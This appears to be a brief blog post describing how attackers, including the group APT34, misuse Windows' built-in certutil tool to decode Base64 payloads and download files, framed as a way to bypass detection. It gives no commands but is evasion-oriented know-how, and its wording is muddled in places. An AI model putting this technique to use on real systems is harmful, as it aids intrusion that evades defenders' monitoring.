Certutil module #APT34

Many attacks in recent years, such as the #APT34, have used the Certutil module, due to the fact that Certutil has two very attractive features for hackers

Certutil is a module related to installing customized Certificates required on Windows operating systems designed by Microsoft and installed by default on Windows operating systems.

But the two features of this module are that, with Certutil we can lower the BASE64 encoding values, so using Certutil instead of a handwritten decoder in Payload hacker can be a very good mode, the second is that we can use this The TextPlain file module can be downloaded and saved for us via External DNS

The purpose of this post was not just to describe CertUtil, but rather to focus on the default services of Windows operating systems under the pretext of this module to provide creative solutions to the bypassing of Detection mechanisms.